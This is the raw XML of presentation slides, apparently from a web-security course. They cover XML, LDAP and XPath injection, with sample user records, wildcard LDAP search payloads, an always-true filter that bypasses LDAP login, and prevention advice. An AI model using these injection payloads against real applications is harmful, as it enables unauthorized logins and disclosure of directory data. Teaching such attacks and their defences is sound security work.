              <a:t>	&lt;user&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>joepublic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt; 					&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;r3g&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;0&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/&gt; 							&lt;mail&gt;joepublic@example1.com&lt;/mail&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	&lt;/user&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	&lt;user&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>janedoe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;an0n&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;500&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>		 &lt;mail&gt;janedoe@example2.com&lt;/mail&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	 &lt;/user&gt; 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>      &lt;/users&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136136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LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto testo 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423356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intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The Lightweight Directory Access Protocol (LDAP) is used to store information about users, hosts, and many other objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A server side attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Goal: Disclose, modify, insert information in LDAP structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>manipulating input parameters afterwards passed to internal search, add, and modify functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A web application could use LDAP in order to let users authenticate or search other users' information inside a corporate structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>=John &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>userPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>mypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>("(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>=John)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>userPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>mypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>))")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freccia in giù 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3059832" y="5049180"/>
            <a:ext cx="4846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1197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Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Filters</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>searchfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>="(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>+")«</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>instantiated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> with) http://www.example.com/ldapsearch?user=John</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.example.com/ldapsearch?user=*</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>earchfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>="(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>=*)«</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If the application is vulnerable to LDAP injection, it will display some or all of the users' attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>Test with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>the parameter '(', '|', '&amp;', '*‘ and check for errors </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194490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Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> injecting an always true LDAP query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(authentication) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>searchlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>= "(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>+")(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>userPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>={MD5}"+base64(pack("H*",md5(pass)))+"))";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>=*)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>=*))(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>=* pass=password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>searchlogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>="(&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>=*)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>=*))(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>=*)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>userPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>={MD5}X03MO1qnZdYdgyfeuILPmQ==))";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>Correct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freccia in giù 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411760" y="4149080"/>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Freccia a destra 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203848" y="468089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4572000" y="4680898"/>
            <a:ext cx="3024336" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the tester will gain logged-in status as the first user in LDAP tree.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081526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Prevention</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>All client-supplied data needs to be cleaned of any characters or strings that could possibly be used maliciously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The best way to filter data is with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>default-deny regular expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that includes only the type of characters that you want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>your filter as specific as possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. Whenever possible use only numbers. After that, numbers and letters only. If you need to include symbols or punctuation of any kind, make absolutely sure to convert them to HTML substitutes (such as “ &amp;quote; ” or “ &gt; ”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>data returned to the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>should be validated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>the LDAP server should not be directly accessible on the Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, thereby eliminating direct attacks to the server itself. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1251611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XPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto testo 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4147653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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Comparing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> with SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Since XPath is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>standard (yet rich) language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, it is possible to carry the attack ‘as-is’ for any XPath implementation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The XPath language can reference practically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>all parts of the XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>document without access control restrictions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>XPath 1.0 is a language used to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>refer to parts of an XML document, or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>as part of a larger operation such as applying an XSLT transformation to an XML document, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
